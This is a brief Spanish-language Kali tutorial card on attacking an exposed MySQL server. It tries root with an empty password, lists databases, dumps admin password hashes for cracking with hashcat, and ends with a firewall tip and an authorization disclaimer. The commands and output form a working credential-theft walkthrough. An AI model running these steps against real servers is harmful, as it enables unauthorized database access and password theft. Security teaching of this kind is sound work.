KALI
Enumera MySQL
Si encuentras un MySQL expuesto en el puerto tres tres cero seis, prueba credenciales débiles o por defecto, como root sin contraseña.
Si entras, listas las bases de datos, y vas directo a la tabla de usuarios, donde suelen estar los hashes de contraseñas. Con esos hashes te vas a hashcat.
Una base de datos accesible desde afuera con credenciales flojas entrega toda la información de la aplicación. Ciérrala al firewall.
# los comandos
kali@kali:~$ mysql -h 10.0.0.5 -u root -pcopiarEnter password: (vacío)
mysql>
mysql> show databases;copiartienda
usuarios
mysql
mysql> select user,password from usuarios.admin;copiaradmin | 5f4dcc3b5aa765d61d8327deb882cf99
Solo con permiso. Esto se muestra con fines educativos y defensivos: úsalo únicamente en sistemas propios o donde tengas autorización. Entender el ataque es lo que te permite defenderte de él.